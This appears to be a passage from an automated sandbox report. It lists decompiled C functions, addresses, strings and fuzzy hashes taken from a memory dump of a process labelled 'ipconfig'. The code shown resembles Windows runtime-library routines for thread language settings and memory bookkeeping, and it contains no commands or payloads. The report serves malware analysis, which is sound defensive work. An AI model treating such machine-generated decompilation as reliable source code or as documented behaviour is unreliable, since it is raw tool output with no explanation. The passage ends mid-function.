              0x02ef5486
              0x02ef548b
              0x00000000
              0x00000000
              0x00000000
              0x02ef548b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02ef5447
              0x02ef5447
              0x02ef5447
              0x02ef5447
              0x02ef544e
              0x00000000
              0x00000000
              0x02ef5450
              0x02ef5452
              0x02ef5455
              0x02ef545a
              0x00000000
              0x00000000
              0x00000000
              0x02ef545c
              0x02ef546a
              0x02ef546d
              0x02ef546f
              0x00000000
              0x02ef546f
              0x02e9e70f

              Strings
              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 02E9E68C
              • @, xrefs: 02E9E6C0
              • InstallLanguageFallback, xrefs: 02E9E6DB
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
              • API String ID: 0-1757540487
              • Opcode ID: a0968ef7eb2229c577e932c5731afe88ecdfaa931ce8f08330fb988eed09d793
              • Instruction ID: 505d9a906127f47b87424c81ba0cc364af81c59d33ee1531ff99b98d014fe2a0
              • Opcode Fuzzy Hash: a0968ef7eb2229c577e932c5731afe88ecdfaa931ce8f08330fb988eed09d793
              • Instruction Fuzzy Hash: A451C2725443459BCB14DF24C440BABB3E9BF98719F45992EFA86E7240F734D904CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ECFAB0 Relevance: 2.8, Strings: 2, Instructions: 306COMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E02ECFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E02EAEEF0(0x2f87b60);
					_t134 =  *0x2f87b84; // 0x77ad7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x2f87b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2f87b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E02EA6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E02EA76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E02F38938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E02E9B150();
													}
													_t116 = E02F36D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E02EA75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x2f88638; // 0x0
																	_t122 = L02EA38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E02EA76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E02EA76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L02ECFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L02EA70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E02ECFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E02ECFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E02ECFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E02ECFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E02ECFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x2f87b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x2f87b84 = _t75;
						_t73 = E02EAEB70(_t134, 0x2f87b60);
						if( *0x2f87b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E02EAFF60( *0x2f87b20);
							}
						}
						goto L5;
					}
				}
			}

















































              0x02ecfab0
              0x02ecfab2
              0x02ecfab3
              0x02ecfab4
              0x02ecfabc
              0x02ecfac0
              0x02ecfb14
              0x02ecfb17
              0x02ecfac2
              0x02ecfac8
              0x02ecfacd
              0x02ecfad3
              0x02ecfad3
              0x02ecfadd
              0x02ecfb18
              0x02ecfb1b
              0x02ecfb1d
              0x02ecfb1e
              0x02ecfb1f
              0x02ecfb20
              0x02ecfb21
              0x02ecfb22
              0x02ecfb23
              0x02ecfb24
              0x02ecfb25
              0x02ecfb26
              0x02ecfb27
              0x02ecfb28
              0x02ecfb29
              0x02ecfb2a
              0x02ecfb2b
              0x02ecfb2c
              0x02ecfb2d
              0x02ecfb2e
              0x02ecfb2f
              0x02ecfb3a
              0x02ecfb3b
              0x02ecfb3e
              0x02ecfb41
              0x02ecfb44
              0x02ecfb47
              0x02ecfb4a
              0x02ecfb4d
              0x02ecfb53
              0x02f0bdcb
              0x02f0bdcb
              0x02ecfb59
              0x02ecfb5b
              0x02ecfb5b
              0x02ecfb5e
              0x02f0bdd5
              0x02f0bdd8
              0x00000000
              0x02f0bdda
              0x00000000
              0x02f0bdda
              0x02ecfb64
              0x02ecfb64
              0x02ecfb64
              0x02ecfb67
              0x02ecfb6e
              0x02ecfb70
              0x02ecfb72
              0x00000000
              0x02ecfb78
              0x02ecfb7a
              0x02ecfb7a
              0x02ecfb7d
              0x02ecfb80
              0x02f0bddf
              0x02f0bde1
              0x00000000
              0x02f0bde3
              0x00000000
              0x02f0bde3
              0x02ecfb86
              0x02ecfb86
              0x02ecfb86
              0x02ecfb8b
              0x02ecfb90
              0x02ecfb92
              0x02ecfb94
              0x02ecfb9a
              0x02ecfb9b
              0x02ecfba1
              0x02f0bde8
              0x02f0bdeb
              0x02f0bded
              0x02f0beb5
              0x02f0beb5
              0x02f0bebb
              0x02f0bebd
              0x02f0bec3
              0x02f0bed2
              0x02f0bedd
              0x02f0bedd
              0x02f0beed
              0x00000000
              0x02f0bdf3
              0x02f0bdfe
              0x02f0be06
              0x02f0be0b
              0x02f0be0d
              0x02f0be0f
              0x02f0be14
              0x02f0be19
              0x02f0be20
              0x02f0be25
              0x02f0be27
              0x02f0be35
              0x02f0be39
              0x02f0be46
              0x02f0be4f
              0x02f0be54
              0x02f0be56
              0x02f0bef8
              0x02f0bef8
              0x00000000
              0x02f0be5c
              0x02f0be5c
              0x02f0be60
              0x00000000
              0x02f0be66
              0x02f0be66
              0x02f0be7f
              0x02f0be84
              0x02f0be87
              0x02f0be89
              0x02f0be8b
              0x02f0be99
              0x02f0be9d
              0x02f0bea0
              0x02f0beac
              0x02f0beaf
              0x02f0beb1
              0x02f0beb3
              0x02f0beb3
              0x00000000
              0x02f0bea2
              0x02f0bea2
              0x00000000
              0x02f0bea2
              0x02f0be8d
              0x02f0be8d
              0x02f0be92
              0x00000000
              0x02f0be92
              0x02f0be8b
              0x02f0be60
              0x02f0be3b
              0x02f0be3b
              0x02f0be3e
              0x00000000
              0x02f0be40
              0x02f0be40
              0x02f0be44
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02f0be44
              0x02f0be3e
              0x02f0be29
              0x02f0be29
              0x00000000
              0x02f0be29
              0x02f0be27
              0x00000000
              0x02ecfba7
              0x02ecfba7
              0x02ecfbab
              0x02f0bf02
              0x02ecfbb1
              0x02ecfbb1
              0x02ecfbb8
              0x02ecfbbd
              0x02ecfbbd
              0x02ecfbbf
              0x02ecfbbf
              0x02ecfbc5
              0x02ecfbcb
              0x02ecfbf8
              0x02ecfbf8
              0x02ecfbfa
              0x00000000
              0x02ecfc00
              0x02ecfc00
              0x02ecfc03
              0x00000000
              0x02ecfc09
              0x02ecfc09
              0x02ecfc0f
              0x02ecfc15
              0x02ecfc23
              0x02ecfc23
              0x02ecfc25
              0x02ecfc27
              0x02ecfc75
              0x02ecfc7c
              0x02ecfc84
              0x00000000
              0x02ecfc29
              0x02ecfc29
              0x02ecfc2d
              0x02ecfc30
              0x02f0bf0f
              0x00000000
              0x02ecfc36
              0x02ecfc38
              0x02ecfc3b
              0x02ecfc41
              0x02f0bf17
              0x02f0bf19
              0x02f0bf48
              0x02f0bf4b
              0x00000000
              0x02f0bf1b
              0x02f0bf22
              0x02f0bf24
              0x02f0bf26
              0x00000000
              0x02f0bf2c
              0x02f0bf37
              0x02f0bf39
              0x02f0bf3b
              0x00000000
              0x02f0bf41
              0x02f0bf41
              0x02f0bf41
              0x02f0bf41
              0x02f0bf45
              0x00000000
              0x02f0bf45
              0x02f0bf3b
              0x02f0bf26
              0x00000000
              0x02ecfc47
              0x02ecfc47
              0x02ecfc49
              0x02ecfcb2
              0x02ecfcb4
              0x02ecfcb6
              0x02ecfcdc
              0x02ecfcdc
              0x00000000
              0x02ecfcb8
              0x02ecfcc3
              0x02ecfcc5
              0x02ecfcc7
              0x00000000
              0x02ecfcc9
              0x02ecfcc9
              0x02ecfccd
              0x00000000
              0x02ecfccd
              0x02ecfcc7
              0x00000000
              0x02ecfc4b
              0x02ecfc4b
              0x02ecfc4e
              0x02ecfc4e
              0x02ecfc51
              0x02ecfc51
              0x02ecfc54
              0x02ecfc5a
              0x02ecfc5c
              0x02ecfc5f
              0x02ecfc61
              0x02ecfc63
              0x02ecfc65
              0x02ecfc67
              0x02ecfc6e
              0x02ecfc72
              0x02ecfc72
              0x02ecfc72
              0x02ecfc72
              0x02ecfc67
              0x02ecfc61
              0x00000000
              0x02ecfc5a
              0x02ecfc49
              0x02ecfc41
              0x02ecfc30
              0x02ecfc27
              0x02ecfc03
              0x02ecfbcd
              0x02ecfbd3
              0x02ecfbd9
              0x02ecfbdc
              0x02ecfbde
              0x02ecfc99
              0x02ecfc9b
              0x02ecfc9d
              0x02ecfcd5
              0x02ecfcd5
              0x02ecfc89
              0x02ecfc89
              0x00000000
              0x02ecfc9f
              0x02ecfc9f
              0x02ecfca3
              0x00000000
              0x02ecfca3
              0x00000000
              0x02ecfbe4
              0x02ecfbe4
              0x02ecfbe4
              0x02ecfbe4
              0x02ecfbe9
              0x02ecfbf2
              0x00000000
              0x02ecfbf2
              0x02ecfbde
              0x02ecfbcb
              0x02ecfbab
              0x02ecfc8b
              0x02ecfc8b
              0x02ecfc8c
              0x02ecfb80
              0x02ecfb72
              0x02ecfb5e
              0x02ecfc8d
              0x02ecfc91
              0x02ecfadf
              0x02ecfadf
              0x02ecfae1
              0x02ecfae4
              0x02ecfae7
              0x02ecfaec
              0x02ecfaf8
              0x02ecfb00
              0x02ecfb07
              0x02ecfb0f
              0x02ecfb0f
              0x02ecfb07
              0x00000000
              0x02ecfaf8
              0x02ecfadd

              Strings
              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 02F0BE0F
              • P1@, xrefs: 02ECFAF1
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$P1@
              • API String ID: 0-600707448
              • Opcode ID: 29d36bad11dfd72a32abf32e89d5fe3e11279dacda998e02b78f7f18db8e561a
              • Instruction ID: 31b3431f7ca9b181139812a4dc6a201f541d384c8221f91ea00cd660dbf9eedc
              • Opcode Fuzzy Hash: 29d36bad11dfd72a32abf32e89d5fe3e11279dacda998e02b78f7f18db8e561a
              • Instruction Fuzzy Hash: 7AA10831B40706CBDB25DBA4C590BBEF3A6AF44758F24956FE906DBA80DB30D802CB44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F5E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
              Download Yara Rule
              C-Code - Quality: 60%
              			E02F5E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E02F5BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E02F5BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E02F5AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E02ED9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E02F5A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E02F5A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E02ED9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E02F5A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E02F5A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E02EB2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E02EAB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E02EAFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E02EB7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E02F4FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































              0x02f5e547
              0x02f5e549
              0x02f5e54f
              0x02f5e553
              0x02f5e557
              0x02f5e55a
              0x02f5e55c
              0x02f5e55f
              0x02f5e561
              0x02f5e567
              0x02f5e56b
              0x02f5e7e2
              0x00000000
              0x02f5e571
              0x02f5e575
              0x02f5e577
              0x02f5e57b
              0x02f5e57c
              0x02f5e57d
              0x02f5e57e
              0x02f5e57f
              0x02f5e588
              0x02f5e58f
              0x02f5e591
              0x02f5e592
              0x02f5e592
              0x02f5e596
              0x02f5e59e
              0x02f5e5a0
              0x02f5e5a6
              0x02f5e61d
              0x02f5e61d
              0x02f5e621
              0x02f5e623
              0x02f5e630
              0x02f5e630
              0x02f5e7e6
              0x02f5e7eb
              0x02f5e7ed
              0x02f5e7f4
              0x02f5e7fa
              0x02f5e7ff
              0x02f5e7ff
              0x02f5e80a
              0x02f5e812
              0x02f5e812
              0x02f5e5ab
              0x02f5e5b4
              0x02f5e5b9
              0x02f5e5be
              0x02f5e5c0
              0x02f5e5c2
              0x02f5e5c8
              0x02f5e5c9
              0x02f5e5cb
              0x02f5e5cc
              0x02f5e5d5
              0x02f5e5e4
              0x02f5e5f1
              0x02f5e5f8
              0x02f5e5f8
              0x02f5e5d5
              0x02f5e602
              0x02f5e616
              0x02f5e63d
              0x02f5e644
              0x02f5e64d
              0x02f5e652
              0x02f5e657
              0x02f5e659
              0x02f5e65b
              0x02f5e661
              0x02f5e662
              0x02f5e664
              0x02f5e665
              0x02f5e66e
              0x02f5e67d
              0x02f5e68a
              0x02f5e691
              0x02f5e691
              0x02f5e66e
              0x02f5e6b0
              0x00000000
              0x02f5e6b6
              0x02f5e6bd
              0x02f5e6c7
              0x02f5e6d7
              0x02f5e6d9
              0x02f5e6db
              0x02f5e6de
              0x02f5e6e3
              0x02f5e6f3
              0x02f5e6fc
              0x02f5e700
              0x02f5e700
              0x02f5e704
              0x02f5e70a
              0x02f5e70a
              0x02f5e713
              0x02f5e716
              0x02f5e719
              0x02f5e720
              0x02f5e761
              0x02f5e76b
              0x02f5e774
              0x02f5e77a
              0x02f5e77a
              0x02f5e78a
              0x02f5e791
              0x02f5e799
              0x02f5e79b
              0x02f5e79f
              0x02f5e7aa
              0x02f5e7c0
              0x02f5e7ac
              0x02f5e7b2
              0x02f5e7b9
              0x02f5e7b9
              0x02f5e7c7
              0x02f5e806
              0x00000000
              0x02f5e7c9
              0x02f5e7d1
              0x02f5e7d8
              0x00000000
              0x02f5e7d8
              0x00000000
              0x00000000
              0x02f5e722
              0x02f5e72e
              0x02f5e748
              0x02f5e74c
              0x02f5e754
              0x02f5e756
              0x02f5e75c
              0x02f5e75c
              0x00000000
              0x02f5e75c
              0x02f5e758
              0x02f5e758
              0x00000000
              0x02f5e758
              0x02f5e750
              0x00000000
              0x00000000
              0x02f5e752
              0x00000000
              0x02f5e752
              0x02f5e730
              0x02f5e735
              0x02f5e73d
              0x02f5e73f
              0x00000000
              0x00000000
              0x02f5e741
              0x02f5e741
              0x00000000
              0x02f5e741
              0x02f5e739
              0x00000000
              0x00000000
              0x02f5e73b
              0x00000000
              0x02f5e73b
              0x02f5e722
              0x02f5e720
              0x02f5e6b0
              0x02f5e618
              0x00000000
              0x02f5e618

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: `$`
              • API String ID: 0-197956300
              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
              • Instruction ID: 859cc4e49f8809c6a2c76fec270c8ddc4549dd09deec4fa64f6e5777f706ede6
              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
              • Instruction Fuzzy Hash: 4B918E716043559BE724CE25C841B1BB7E6AF84798F14892DFBA9CB280E774EA04CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F151BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E02F151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x2f705f0);
				E02EED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
